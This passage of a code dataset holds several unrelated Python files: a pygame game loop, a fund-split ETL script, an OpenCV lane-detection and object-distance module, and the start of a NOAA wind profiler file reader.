LCD_CMD)\n\t\tlcd_string(\"Finalizando!...\",LCD_LINE_1)\n\t\tGPIO.cleanup()\n#--------+---------+---------+---------+---------+---------+---------+----------\n","sub_path":"3-LCD_basico.py","file_name":"3-LCD_basico.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"95353470","text":"from sys import exit\nimport os\nimport pygame\nfrom pygame.locals import *\nimport core.gl as gl\nimport core.fsm as fsm\nimport core.mouse as mouse\nimport core.keyboard as keyboard\nfrom core.role import Role\nfrom core.npc import Npc\nfrom core.map import Map\n\nif __name__ == '__main__':\n pygame.init()\n pygame.display.set_caption('World of soul')\n screen = pygame.display.set_mode((800, 600), DOUBLEBUF, 32)\n fps_clock = pygame.time.Clock()\n player = Role(screen)\n largemap = Map(screen)\n sysnpc = Npc(screen)\n\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n exit()\n start = fps_clock.tick()\n #pygame.mixer.music.set_volume(gl.MUSIC['volume'])\n #if not pygame.mixer.music.get_busy():\n # pygame.mixer.music.load(gl.MUSIC['name'][gl.MUSIC['index']])\n # pygame.mixer.music.play()\n mouse.get()\n keyboard.get()\n if len(gl.DIRECTION) > 0:\n direction = gl.DIRECTION.pop()\n player.set_direction(direction)\n if direction == 0:\n gl.ROLE['x'] -= 10\n gl.ROLE['y'] -= 10\n elif direction == 1:\n 
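# Directions: 0 up-left, 1 up, 2 up-right, 3 left, 4 right, 5 down-left, 6 down, 7 down-right; here only y changes\n                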
gl.ROLE['y'] -= 10\n elif direction == 2:\n gl.ROLE['x'] += 10\n gl.ROLE['y'] -= 10\n elif direction == 3:\n gl.ROLE['x'] -= 10\n elif direction == 4:\n gl.ROLE['x'] += 10\n elif direction == 5:\n gl.ROLE['x'] -= 10\n gl.ROLE['y'] += 10\n elif direction == 6:\n gl.ROLE['y'] += 10\n elif direction == 7:\n gl.ROLE['x'] += 10\n gl.ROLE['y'] += 10\n else:\n fsm.disable('role','move')\n largemap.draw()\n sysnpc.draw()\n player.draw()\n pygame.display.flip()\n end = fps_clock.tick()\n speed = end - start\n fps_clock.tick(12)\n","sub_path":"src/pygame/wos.py","file_name":"wos.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"289231587","text":"import datetime as dt\nimport pandas as pd\nfrom sqlalchemy import and_\nfrom sqlalchemy.orm import sessionmaker\nfrom utils.database import io, config as cfg\nfrom utils.algorithm import etl\nfrom utils.database.models.crawl_public import DFundSplit\nfrom utils.database.models.base_public import IdMatch, FundInfo, FundSplit\n\n_engine_wt = cfg.load_engine()[\"2Gbp\"]\n_db_session = sessionmaker(bind=_engine_wt)\n_session = _db_session()\nUPDATE_TIME = etl.update_time[\"all\"]\n\n_entities_map = [\n (FundInfo.fund_id, FundSplit.fund_id), (FundInfo.fund_name, FundSplit.fund_name), (DFundSplit.data_source, FundSplit.data_source),\n (DFundSplit.statistic_date, FundSplit.statistic_date), (DFundSplit.split_date, FundSplit.split_date),\n (DFundSplit.split_ratio, FundSplit.split_ratio)\n]\n_input_entities = [x[0] for x in _entities_map]\n_map_entities = [x[1] for x in _entities_map]\n\n_derivative_entities = []\n_output_entities = [*_map_entities, *_derivative_entities]\n\n\ndef fetch_multisource_split(update_time):\n \"\"\"\n Fetch records of DOrgInfo table where record update time >= `update_time`\n Args:\n update_time: record update time\n\n Returns:\n pandas.DataFrame\n \"\"\"\n query_fnv = _session.query(IdMatch).join(\n FundInfo, and_(IdMatch.id_type == 1, IdMatch.matched_id == FundInfo.fund_id)\n ).join(\n DFundSplit, and_(IdMatch.id_type == 1, IdMatch.source_id == DFundSplit.fund_id, IdMatch.data_source == DFundSplit.data_source)\n ).filter(\n and_(DFundSplit.update_time >= update_time, IdMatch.is_used == 1)\n ).with_entities(\n *_input_entities\n )\n df = pd.DataFrame(query_fnv.all())\n df.columns = [x.name for x in _map_entities]\n df.index = df[[FundInfo.fund_id.name, FundSplit.statistic_date.name]]\n return df\n\n\ndef transform():\n df = fetch_multisource_split(UPDATE_TIME)\n\n df_020001 = df.ix[df[FundInfo.data_source.name] == \"020001\"]\n df_020002 = df.ix[df[FundInfo.data_source.name] == \"020002\"]\n df_020003 = df.ix[df[FundInfo.data_source.name] == \"020003\"]\n\n result = df_020002.join(\n df_020001, how=\"outer\", rsuffix=\"_020001\"\n ).join(\n df_020003, how=\"outer\", rsuffix=\"_020003\"\n )[df_020002.columns].fillna(df_020001).fillna(df_020003)\n\n std_rec_date = {}\n for idx in df_020002.index:\n std_rec_date.setdefault(idx[0], set()).add(idx[1])\n std_split = {}\n for idx in df_020002.index:\n std_split[idx] = float(df_020002.ix[[idx], FundSplit.split_ratio.name][idx])\n\n drop_list = []\n result_not_main = result.ix[result[FundSplit.data_source.name] != \"020002\"]\n for idx in result_not_main.index:\n fid, rdate = result_not_main.ix[[idx]].index.tolist()[0]\n for tolerant in [0, 1, -1, 2, -2]:\n date_possible = rdate + dt.timedelta(tolerant)\n if date_possible in std_rec_date.get(fid, set()):\n val = float(result_not_main.ix[[idx], 
FundSplit.split_ratio.name][idx])\n val_std = std_split[(fid, date_possible)]\n length_min = min(len(str(val).split(\".\")[1]), len(str(val_std).split(\".\")[1]))\n if round(val, length_min) == round(val_std, length_min):\n drop_list.append(idx)\n result = result.drop(drop_list)\n\n return result\n\n\ndef main():\n io.to_sql(FundSplit.__tablename__, _engine_wt, transform())\n\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"SCRIPT/MUTUAL/etl/fund_split.py","file_name":"fund_split.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"254317874","text":"from collections import defaultdict\nfrom math import floor, sqrt, atan2, cos, sin\n\nimport cv2\nimport numpy as np\n\n\nclass LaneDetection:\n \"\"\"\n Lane_Detection class basically detects the left and right line of an image\n \"\"\"\n\n def __init__(self, resized_dims, cropped=True):\n self.cropped = cropped\n self.lines = None\n self.resized_dims = resized_dims\n self.roi = [(0, self.resized_dims[1]), (self.resized_dims[0] / 2, 0),\n (self.resized_dims[0], self.resized_dims[1]), ]\n\n def region_of_interest(self, grey_scale_bool, img, vertices):\n \"\"\"\n Masks a ROI in the image in order to reduce the area where detecting the lane\n \"\"\"\n # Define a blank matrix that matches the image height/width.\n mask = np.zeros_like(img)\n\n # Create a match color with the same color channel counts.\n # If we are using grey_scale,just one color mask\n if grey_scale_bool:\n match_mask_color = 255\n\n else:\n # Retrieve the number of color channels of the image.\n channel_count = img.shape[2]\n match_mask_color = (255,) * channel_count\n\n # Fill inside the polygon\n cv2.fillPoly(mask, vertices, match_mask_color)\n\n # Returning the image only where mask pixels match\n masked_image = cv2.bitwise_and(img, mask)\n return masked_image\n\n def makeLinePoints(self, y1, y2, line):\n \"\"\"\n Convert a line represented in slope and intercept into pixel points\n :param y1: to compute the (x1, y1) point from line\n :param y2: to compute the (x1, y1) point from line\n :param line: slope and intercept that define the line\n :return:\n \"\"\"\n if line is None:\n return None\n intercept, slope = line\n\n # cv2.line requires integers\n x1 = int((y1 - intercept) / slope)\n x2 = int((y2 - intercept) / slope)\n y1 = int(y1)\n y2 = int(y2)\n return (x1, y1), (x2, y2)\n\n def average_slope_intercept(self, lines):\n \"\"\"\n Reduce all the lines detected into a combination of all of them, which are right and left lines.\n :param lines: bunch of lines detected from the Hough Filter\n :return: the left and right mostly accurate lane\n \"\"\"\n avgLines = defaultdict(list)\n weights = defaultdict(list)\n for line in lines:\n for x1, y1, x2, y2 in line:\n if x2 == x1:\n continue # Ignore a vertical line\n slope = (y2 - y1) / float(x2 - x1)\n slope = floor(slope * 10) / 10\n\n # Discarting impossible slopes\n if slope == 0 or abs(slope) < 0.5 or abs(slope) > 2.5:\n continue # Avoid division by zero\n\n intercept = y1 - slope * x1\n length = np.sqrt((y2 - y1) ** 2 + (x2 - x1) ** 2)\n avgLines[slope].append((slope, intercept))\n weights[slope].append(length)\n\n keys = []\n for key in sorted(avgLines):\n keys.append(key)\n\n newAvgLines = defaultdict(list)\n newWeights = defaultdict(list)\n for i in range(1, len(keys)):\n if abs(keys[i] - keys[i - 1]) <= .1:\n slope = (keys[i] + keys[i - 1]) / 2.0\n for (s, intercept) in avgLines[keys[i]]:\n 
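# Line candidates whose slopes differ by 0.1 or less are merged under one averaged slope\n                    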
newAvgLines[slope].append((s, intercept))\n for (s, intercept) in avgLines[keys[i - 1]]:\n newAvgLines[slope].append((s, intercept))\n for (l) in weights[keys[i]]:\n newWeights[slope].append((l))\n for (l) in weights[keys[i - 1]]:\n newWeights[slope].append((l))\n else:\n if (i == 1):\n slope = keys[i - 1]\n for (s, intercept) in avgLines[keys[i - 1]]:\n newAvgLines[slope].append((s, intercept))\n for (l) in weights[keys[i - 1]]:\n newWeights[slope].append((l))\n slope = keys[i]\n for (s, intercept) in avgLines[keys[i]]:\n newAvgLines[slope].append((s, intercept))\n for (l) in weights[keys[i]]:\n newWeights[slope].append((l))\n\n left = {}\n right = {}\n values_right = {}\n values_left = {}\n for key in newAvgLines:\n slope_mean = np.mean(list(map(lambda x: x[0], newAvgLines[key])))\n intercept_mean = np.mean(list(map(lambda x: x[1], newAvgLines[key])))\n if slope_mean > 0:\n left[slope_mean] = intercept_mean\n values_left[slope_mean] = np.size(newWeights[key])\n\n else:\n right[slope_mean] = intercept_mean\n values_right[slope_mean] = np.size(newWeights[key])\n\n if len(values_right) > 0:\n def_slope_right = np.dot(list(values_right.keys()), list(values_right.values())) / np.sum(\n list(values_right.values()))\n def_intercept_right = np.dot(list(right.values()), list(values_right.values())) / np.sum(\n list(values_right.values()))\n else:\n def_slope_right = None\n def_intercept_right = None\n\n if len(values_left) > 0:\n def_slope_left = np.dot(list(values_left.keys()), list(values_left.values())) / np.sum(\n list(values_left.values()))\n def_intercept_left = np.dot(list(left.values()), list(values_left.values())) / np.sum(\n list(values_left.values()))\n else:\n def_slope_left = None\n def_intercept_left = None\n\n return (def_intercept_left, def_slope_left), (def_intercept_right, def_slope_right)\n\n def laneLines(self, image, lines):\n \"\"\"\n Get the points to draw the lines in the image\n :param image: image where we will draw the line\n :param lines: lines detected from the Hough Transformation\n :return: right and left lines defined by 2 points in determined Y coordinates\n \"\"\"\n y1 = image.shape[0] # Bottom of the image\n y2 = image.shape[0] * 0.5 # Slightly lower than the middle\n\n leftLane, rightLane = self.average_slope_intercept(lines)\n if leftLane[0] != None:\n leftLine = self.makeLinePoints(y1, y2, leftLane)\n else:\n leftLine = None\n\n if rightLane[0] != None:\n rightLine = self.makeLinePoints(y1, y2, rightLane)\n else:\n rightLine = None\n return leftLine, rightLine\n\n def drawLaneLines(self, image, lines, color=[0, 255, 0], thickness=20):\n \"\"\"\n :param image: image where we draw the detected lines\n :param lines: 2 points left and right lines definition\n :param color: Color for the drawing --> Default: Blue\n :param thickness: Thick of the lines drawn --> Default: 20\n :return: the image where the lines are draw into as coordinate points\n \"\"\"\n # Make a separate image to draw lines and combine with the orignal later\n lineImage = np.zeros_like(image)\n\n for line in lines:\n if line is not None:\n (x1, y1), (x2, y2) = line\n image = cv2.line(image, (x1, y1), (x2, y2), color, thickness)\n # IF WANT THE LINES TO BE DRAWN SMOOTHLY\n # return lines, cv2.addWeighted(image, 1.0, lineImage, 0.95, 0.0)\n return lines, image\n\n def process_image(self, image):\n \"\"\"\n Processes the frame passed as parameter to detect the lines left and right of the lane\n :param image: image where the lines are detected from\n :return: image with the detected lines drawn and 
the actual lines detected\n \"\"\"\n\n self.frame = image\n original_img = np.copy(image)\n\n # Crop image with the region of interest\n if self.cropped:\n cropped_image = self.region_of_interest(False, original_img, np.array([self.roi], np.int32), )\n hsv = cv2.GaussianBlur(cropped_image, (5, 5), 0)\n else:\n hsv = cv2.GaussianBlur(original_img, (5, 5), 0)\n\n low_white = np.array([150, 150, 150])\n up_white = np.array([255, 255, 255])\n\n mask = cv2.inRange(hsv, low_white, up_white)\n\n edges = cv2.Canny(mask, 50, 150)\n lines = cv2.HoughLinesP(edges, rho=6, theta=np.pi / 60, threshold=160, lines=np.array([]), minLineLength=40,\n maxLineGap=25)\n if lines is None:\n return [], self.frame\n else:\n (left_lane, right_lane) = self.laneLines(self.frame, lines)\n lines_def = []\n if left_lane is not None:\n lines_def.append(left_lane)\n if right_lane is not None:\n lines_def.append(right_lane)\n return self.drawLaneLines(self.frame, lines_def)\n\n\nclass Distance:\n def __init__(self, dimensions, fps, width=2.3, lines=None, visualize=False):\n self.fps = fps\n self.width = width\n self.lines = lines\n self.warpRatio =1\n self.visualize = visualize\n self.resized_dims = dimensions\n self.objects = {}\n\n def getRealDistances(self, centroid):\n \"\"\"\n Get the Distance in real world between the camera and the object\n :param box: coordinates for the box in the image\n :return: Distance X and Y between the object and the camera\n \"\"\"\n # We need to obtain the centroid of the box of the object obtained to compute distance from it However we\n # think it is more interesting to compute the distance from the lower edge of the bounding box (as it is the\n # nearest to the ground)\n object_cx, object_cy = centroid\n distX, distY = self.projectiveModel((object_cx, object_cy))\n return (distX, distY)\n\n def defineLine(self, points):\n \"\"\"\n Define a line by slope and intercept from two points\n :param points: 2 points of the line\n :return: slope and intercept for the line that cross both points\n \"\"\"\n (x1, y1), (x2, y2) = points\n slope = floor((y2 - y1) / float(x2 - x1) * 10) / 10\n intercept = y1 - slope * x1\n line = (intercept, slope)\n return line\n\n def projectiveModel(self, objectCentroids):\n \"\"\"\n Calculate Homogenous perspective to compute distances\n :param objectCentroids: centroid of the object bounding box coordinates\n :return: X and Y distance in meters of the object to the camera\n \"\"\"\n point = self.calculateWrappingPoint(np.array(objectCentroids))\n centroid_camera = self.calculateWrappingPoint(np.array((self.resized_dims[0] / 2, self.resized_dims[1])))\n dist_pixelsX = abs(point[0] - centroid_camera[0])\n dist_pixelsY = abs(point[1] - centroid_camera[1])\n return self.warpRatio * dist_pixelsX, self.warpRatio * dist_pixelsY\n\n def getVanishingPoint(self, lines):\n \"\"\"\n Computes the vanishing point for the lanes\n :param lines: left and right lines equations\n :return: point coordinates where left and right lines collide\n \"\"\"\n (intercept_left, slope_left), (intercept_right, slope_right) = lines\n vanishingPointX = (intercept_left - intercept_right) / (slope_right - slope_left)\n vanishingPointY = intercept_left + slope_left * vanishingPointX\n vanishingPoint = (vanishingPointX, vanishingPointY)\n return vanishingPoint\n\n def birdEyeTransformation(self, image, option=\"Vanishing Point\"):\n \"\"\"\n Homogenous transformtion using Bird's eye view from OpenCv\n :param image: image where applying the transformation\n :param image_size: dimension of the 
image\n :param option: the method to implemente the Bird Eye transformation : by the already detected lines [default] or by using the vanishing point\n :return: It gives the Matrix of perspectives, the ratio and the image transformed\n \"\"\"\n # Defining the inputs for the matrix\n (x1_l, y1_l), (x2_l, y2_l) = self.lines[0]\n (x1_r, y1_r), (x2_r, y2_r) = self.lines[1]\n IMAGE_W, IMAGE_H = self.resized_dims\n\n if option is None:\n # First approach: lane detection without vanishing point computation\n src = np.float32([[x1_l, y1_l], [x2_l, y2_l], [x1_r, y1_r], [x2_r, y2_r]])\n dst = np.float32([[0, IMAGE_H], [0, 0], [IMAGE_W, IMAGE_H], [IMAGE_W, 0]])\n\n elif option == \"Vanishing Point\":\n # Second approach: lane detection wit vanishing point computation\n left, right = self.defineLine(self.lines[0]), self.defineLine(self.lines[1])\n vanishingPoint = self.getVanishingPoint((left, right))\n warped_width = int(IMAGE_H * 0.15)\n top = vanishingPoint[1] + int(warped_width * 0.15)\n bottom = IMAGE_W + int(0.02 * IMAGE_W)\n\n def on_line(p1, p2, ycoord):\n return [p1[0] + (p2[0] - p1[0]) / float(p2[1] - p1[1]) * (ycoord - p1[1]), ycoord]\n\n p1 = [vanishingPoint[0] - warped_width / 2, top]\n p2 = [vanishingPoint[0] + warped_width / 2, top]\n p3 = on_line(p2, vanishingPoint, bottom)\n p4 = on_line(p1, vanishingPoint, bottom)\n src = np.float32([p1, p2, p3, p4])\n dst = np.float32([[0, 0], [IMAGE_W, 0], [IMAGE_W, IMAGE_H], [0, IMAGE_H]])\n\n self.M = cv2.getPerspectiveTransform(src, dst) # The transformation matrix\n self.Minv = cv2.getPerspectiveTransform(dst, src) # Inverse transformation\n\n # If we want to check accuracy of the method for bird eye transform point\n # self.checkAccuracy(src,dst)\n\n warped_img = cv2.warpPerspective(image, self.M, (IMAGE_W, IMAGE_H))\n if self.visualize == True:\n cv2.imshow(\"Bird Eye\", warped_img)\n\n self.pointLeft = self.calculateWrappingPoint((x1_l, y1_l))\n self.pointRight = self.calculateWrappingPoint((x1_r, y1_r))\n pixel_distance = abs(self.pointLeft[0] - self.pointRight[0])\n self.warpRatio = self.width / pixel_distance\n\n def calculateWrappingPoint(self, point):\n \"\"\"\n Calculate the coordinate in the bird's eye view of a point in the original image\n :param point: original image point\n :return: bird's eye image point\n \"\"\"\n point = np.append(point, 1)\n a = self.M.dot(point)\n if a[2] == 0:\n dst = (0,0)\n else:\n dst = a / a[2]\n return np.array([dst[0], dst[1]])\n\n def calculateCameraPoint(self, point):\n \"\"\"\n Calculate the coordinate in the camera's view of a bird's eye view point\n :param point: bird's eye image point\n :return: original image point\n \"\"\"\n point = np.append(point, 1)\n a = self.Minv.dot(point)\n if a[2] == 0:\n dst = (0,0)\n else:\n dst = a / a[2]\n return np.array([dst[0], dst[1]])\n\n def checkAccuracy(self, src, dst):\n \"\"\"\n Method to calculate the accuracy of the method to calculate the Transformation Matrix\n :param src: points to define the Matrix\n :param dst: points to output the Matrix\n :return: Accuracy of the perspective\n \"\"\"\n if self.acc is None:\n self.acc = []\n i = 0\n diff = []\n for point in src:\n acc = np.linalg.norm(dst[i] - self.calculateWrappingPoint(point))\n diff.append(acc)\n i += 1\n self.acc.append(np.mean(diff))\n print(\"Accuracy is: \" + str(np.mean(self.acc)))\n\n def makeLinePoints(self, y1, y2, line):\n \"\"\"\n Convert a line represented in slope and intercept into pixel points\n :param y1: to compute the (x1, y1) point from line\n :param y2: to compute the (x1, y1) 
point from line\n :param line: slope and intercept that define the line\n :return:\n \"\"\"\n if line is None:\n return None\n intercept, slope = line\n\n # cv2.line requires integers\n x1 = int((y1 - intercept) / slope)\n x2 = int((y2 - intercept) / slope)\n y1 = int(y1)\n y2 = int(y2)\n return (x1, y1), (x2, y2)\n\n def computeDistance(self, box):\n \"\"\"\n Returns de real distance of the object to the camera\n :param box: Coordinates of an object --> Bounding box: ((x1, y1), (x2, y2))\n :return: Real distance of the object to the camera\n \"\"\"\n # We can just compute the distance if both lines are detected:\n if len(self.lines) == 2:\n (x1, y1, x2, y2) = box\n # We are actually searching for a point in the center X and bottom Y of the bounding box (as we measure just in the track lane)\n point = ((x1+x2)/2, max(y1, y2))\n real_obj_coordinates = self.getRealDistances(point)\n real_distance = np.linalg.norm(real_obj_coordinates)\n return real_distance, real_obj_coordinates\n print(\"Real distance of the object can no be find as lines have not been detected\")\n\n def updateObject(self, id, boxes):\n \"\"\"\n Updates the self.objects variable. This variable just contains the last 10 bounding boxes of an object to compute velocities and directions\n :param id: id of the object which box is going to be updated\n :param boxes: coordinates of the new bounding box detected for the object\n \"\"\"\n # If object was never detected, initialize in dictionary of all objects detected\n past = self.objects.get(id)\n if past == None:\n self.objects[id] = []\n\n # In case the len of the object is 10, we need to update the oldest value with the ne one\n if len(self.objects[id]) == 10:\n del self.objects[id][0]\n\n # Save the box of the object detected for the last ten frames\n self.objects[id].append(boxes)\n\n def deleteObject(self, objectId):\n \"\"\"\n Deletes an object inside the class when it disappears\n :param objectId: ID of the object that has disappeared\n \"\"\"\n self.objects.pop(objectId, None)\n\n def computeAllDistances(self, image, lines, objects):\n \"\"\"\n Main function for Distance class. Return all distances to all objects detected in an image\n :param image: image where the image have been detected to\n :param lines: left and right line detected. 
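Each line is given as two (x, y) endpoints. 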
Necessary to compute ratios and scalate to real life measurements\n :param objects: all the centroid of the bounding boxes for all the objects detected with their ID's\n :return: the distances to all the centroid bounding boxes with its determined ID's\n \"\"\"\n distances = {}\n coords = {}\n # Establish the new line\n if len(lines[0]) == 2:\n self.lines = lines\n\n if self.lines is None or len(self.lines) != 2:\n print(\"Lines not found, can not compute real distances.\")\n for id, boxes in objects.items():\n # Update the object list array of boxes\n self.updateObject(id, boxes)\n return None, None\n # Establish the new homogeneous perspective matrix\n try:\n self.birdEyeTransformation(image)\n except Exception as ex:\n print(\"Lines not found, can not compute real distances.\")\n for id, boxes in objects.items():\n # Update the object list array of boxes\n self.updateObject(id, boxes)\n return None, None\n\n for id, boxes in objects.items():\n # Update the object list array of boxes\n self.updateObject(id, boxes)\n # Compute the real distance for the specific object\n distances[id], coords[id] = self.computeDistance(boxes)\n\n return distances, coords\n\n def getCentroid(self, box):\n \"\"\"\n Returns the Centroid coordinates of an object.\n :param box: coordinates of the bounding box of an object --> Box\n :return:\n \"\"\"\n (x1, y1 , x2, y2) = box\n object_cx, object_cy = (x2 + x1) / 2, (y1 + y2) / 2\n return (object_cx, object_cy)\n\n\n def computeRelativeVelocity(self, objectId):\n \"\"\"\n Compute the relative velocity of the object making some mathematical calculus on the last 10 bounding boxes of\n the object detected. The calculus are made in the bird eye's view.\n :param objectId: ID to identify the object in our intern self.objects dictionary\n :return: vector of the velocity, given by the module and the angle of the direction.\n \"\"\"\n vectors = []\n boxes = self.objects[objectId]\n\n i=0\n if len(boxes) < 2:\n return None\n while i + 1 < len(boxes):\n # Transform all the the camera coordinates into the homogeneous perspective\n obj1 = self.calculateWrappingPoint(self.getCentroid(boxes[i]))\n obj2 = self.calculateWrappingPoint(self.getCentroid(boxes[i+1]))\n distance = [obj2[0] - obj1[0], obj2[1] - obj1[1]]\n # We normalize the vector\n dist_norm = sqrt(distance[0] ** 2 + distance[1] ** 2)\n vector_norm = dist_norm / self.fps\n angle = atan2(distance[1],distance[0])\n vectors.append((vector_norm, angle))\n i +=1\n # The output contains the module and angle for the Homogenous perspective\n return np.mean(np.array([norm[0] for norm in vectors])), np.mean(np.array([angle[1] for angle in vectors]))\n\n def getLast(self, objectId):\n \"\"\"\n Used to obrain the last Box update of the Object Id\n :param objectId: the object we are referring to\n :return: the most updated bounding box for the object\n \"\"\"\n list = self.objects[objectId]\n return list[len(list)-1]\n\n def computeVelocity(self, objectId, velocity_cam):\n \"\"\"\n Compute the absolut velocity of the object taking into account the camera velocity\n :param objectId: ID to identify the object in our intern self.objects dictionary\n :param velocity_cam: velocity of the user\n :return: absolute velocity of the object\n \"\"\"\n # Relative velocity that contains the module and angle for the Homogenous perspective\n orig_centroid = self.getCentroid(self.getLast(objectId))\n relative_object_velocity = self.computeRelativeVelocity(objectId)\n if relative_object_velocity is None:\n return None\n\n # Absolut velocity of the 
objects in the Homogenous perspective in vector coordinates\n absolute_object_velocity = self.final_point(velocity_cam, relative_object_velocity, factor=1/100)\n\n # Coordinates of the original centroid into the Bird's Eye View\n transformed_point =self.calculateWrappingPoint(orig_centroid)\n\n # Last point of the velocity array inside the Bird Eye's View\n final_point = self.final_point(transformed_point, absolute_object_velocity, factor = 1)\n\n #Last point of the velocity array inside the Camera's perspective\n cam_abs_velocity = self.calculateCameraPoint(final_point)\n\n # Computing the velocity array\n velocity = int(cam_abs_velocity[0] - orig_centroid[0]), int(cam_abs_velocity[1] - orig_centroid[1])\n\n # Computing the angle and the norm of the velocity\n angle = atan2(velocity[1], velocity[0])\n norm = sqrt(velocity[0] ** 2 + velocity[1] ** 2)\n return (norm, angle)\n\n\n def computeAllVelocities(self, objectIds, cameraVelocity =25):\n \"\"\"\n Return all velocities to all objects detected in an image\n :param objectIds:all the objects IDs\n :return: the velocity of all objects which their corresponding IDs\n \"\"\"\n velocities = {}\n vector_camera = self.getCameraVelocity(cameraVelocity)\n for id in objectIds:\n # Compute the velocities for each object\n velocities[id] = self.computeVelocity(id, vector_camera)\n return velocities\n\n def getCameraVelocity(self, cameraVelocity):\n \"\"\"\n Set the camera velocity vector. Take into account that it will always have the perpendicular direction to width of camera (0,1)*module\n :param cameraVelocity: modul of the velocity by default (if location used) or (norm, angle) of all mean static velocities obtained\n :return: vector of camera velocity\n \"\"\"\n # If its only the module\n if type(cameraVelocity) == int:\n return (0, -1 * cameraVelocity)\n # If it contains module and norm, which means it is computed by static:\n else:\n return self.final_point((0,0),(-1* cameraVelocity[0], cameraVelocity[1]), factor=1/100)\n\n def drawCameraVector(self,camera_velocity_static):\n \"\"\"\n Used to draw the velocity array of the camera\n :param camera_velocity_static: velocity array as coordinates in the homogenous view\n :return: initial point of the camera and final point. 
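Both points are in camera-view pixel coordinates. 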
Used to draw the arrow\n \"\"\"\n # We will also draw, in the camera view, the absolute velocity arrow for the camera.\n camera_abs_vel = self.getCameraVelocity(camera_velocity_static)\n initial_point_camera = (int((self.pointLeft[0] + self.pointRight[0]) / 2), int(self.resized_dims[1]))\n final_point_camera = (initial_point_camera[0] + camera_abs_vel[0], initial_point_camera[1] + camera_abs_vel[1])\n camera_array = self.calculateCameraPoint(final_point_camera)\n return initial_point_camera,(int(camera_array[0]), int(camera_array[1]))\n\n def final_point(self, point, velocity, factor=None):\n \"\"\"\n From an initial point computes the velocity to the next point where should be placed if the velocity persits\n :param point: initial centroid of the object\n :param velocity: velocity of the object in this determined moment\n :return: output\n \"\"\"\n if factor is None:\n factor = self.warpRatio\n norm, angle = velocity\n if factor == 0:\n return (point[0], point[1])\n x_mod = norm*cos(angle) / factor\n y_mod = norm*sin(angle) / factor\n return (point[0]+x_mod, point[1]+y_mod)\n","sub_path":"Extras/MovementEstimators.py","file_name":"MovementEstimators.py","file_ext":"py","file_size_in_byte":26416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"600746046","text":"\"\"\"\nModules for reading in NOAA PSL data.\n\"\"\"\n\nimport datetime as dt\n\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\n\n\ndef read_psl_wind_profiler(filename, transpose=True):\n \"\"\"\n Returns `xarray.Dataset` with stored data and metadata from a user-defined\n NOAA PSL wind profiler file.\n\n Parameters\n ----------\n filename : str\n Name of file(s) to read.\n transpose : bool\n True to transpose the data.\n\n Return\n ------\n obj_low : Xarray.dataset\n Standard Xarray dataset with the data for low mode\n obj_high : Xarray.dataset\n Standard Xarray dataset with the data for high mode.\n\n \"\"\"\n # read file with pandas for preparation.\n df = pd.read_csv(filename, header=None)\n\n # Get location of where each table begins\n index_list = df[0] == ' CTD'\n idx = np.where(index_list)\n\n # Get header of each column of data.\n column_list = list(df.loc[9][0].split())\n\n beam_vars = ['RAD', 'CNT', 'SNR', 'QC']\n for i, c in enumerate(column_list):\n if c in beam_vars:\n if column_list.count(c) > 2:\n column_list[i] = c + '1'\n elif column_list.count(c) > 1:\n column_list[i] = c + '2'\n elif column_list.count(c) > 0:\n column_list[i] = c + '3'\n\n # Loop through column data only which appears after 10 lines of metadata.\n # Year, Month, day, hour, minute, second, utc offset\n low = []\n hi = []\n for i in range(idx[0].shape[0] - 1):\n # index each table by using the idx of when CTD appears.\n # str split is use as 2 spaces are added to each data point,\n # convert to float.\n date_str = df.iloc[idx[0][i] + 3]\n date_str = list(filter(None, date_str[0].split(' ')))\n date_str = list(map(int, date_str))\n # Datetime not taking into account the utc offset yet\n time = dt.datetime(\n 2000 + date_str[0], date_str[1], date_str[2], date_str[3],\n date_str[4], date_str[5])\n\n mode = df.iloc[idx[0][i] + 7][0]\n mode = int(mode.split(' ')[-1])\n\n df_array = np.array(\n df.iloc[idx[0][i] + 10:idx[0][i + 1] - 1][0].str.split(\n r'\\s{2,}').tolist(), dtype='float')\n df_add = pd.DataFrame(df_array, columns=column_list)\n df_add = df_add.replace(999999.0, np.nan)\n\n xr_add = df_add.to_xarray()\n xr_add = xr_add.swap_dims({'index': 'height'})\n xr_add = 
xr_add.reset_coords('index')\n xr_add = xr_add.assign_coords(\n {'time': np.array(time), 'height': xr_add['HT'].values})\n\n if mode < 1000.:\n low.append(xr_add)\n else:\n hi.append(xr_add)\n\n obj_low = xr.concat(low, 'time')\n obj_hi = xr.concat(hi, 'time')\n\n # Adding site information line 1\n site_loc = df.iloc[idx[0][0]]\n site_list = site_loc.str.split(r'\\s{2}').tolist()\n site = site_list[0][0].strip()\n\n obj_low.attrs['site_identifier'] = site\n obj_hi.attrs['site_identifier'] = site\n\n # Adding data type and revision number line 2.\n rev = df.loc[idx[0][0] + 1]\n rev_list = rev.str.split(r'\\s{3}').tolist()\n rev_array = np.array(rev_list[0])\n\n obj_low.attrs['data_type'] = rev_array[0].strip()\n obj_hi.attrs['data_type'] = rev_array[0].strip()\n obj_low.attrs['revision_number'] = rev_array[1].strip()\n obj_hi.attrs['revision_number'] = rev_array[1].strip()\n\n # Adding coordinate attributes line 3.\n coords = df.loc[idx[0][0] + 2]\n coords_list = coords.str.split(r'\\s{2,}').tolist()\n coords_list[0].remove('')\n coords_array = np.array(coords_list[0], dtype='float32')\n\n obj_low.attrs['latitude'] = np.array([coords_array[0]])\n obj_hi.attrs['latitude'] = np.array([coords_array[0]])\n obj_low.attrs['longitude'] = np.array([coords_array[1]])\n obj_hi.attrs['longitude'] = np.array([coords_array[1]])\n obj_low.attrs['altitude'] = np.array([coords_array[2]])\n obj_hi.attrs['altitude'] = np.array([coords_array[2]])\n\n # Adding azimuth and elevation line 9\n az_el = df.loc[idx[0][0] + 8]\n az_el_list = az_el.str.split(r'\\s{2,}').tolist()\n az_el_list[0].remove('')\n az_el_array = np.array(az_el_list[0])\n az = []\n el = []\n for i in az_el_array:\n sep = i.split()\n az.append(sep[0])\n el.append(sep[1])\n az_array = np.array(az, dtype='float32')\n el_array = np.array(el, dtype='float32')\n\n obj_low.attrs['azimuth'] = az_array\n 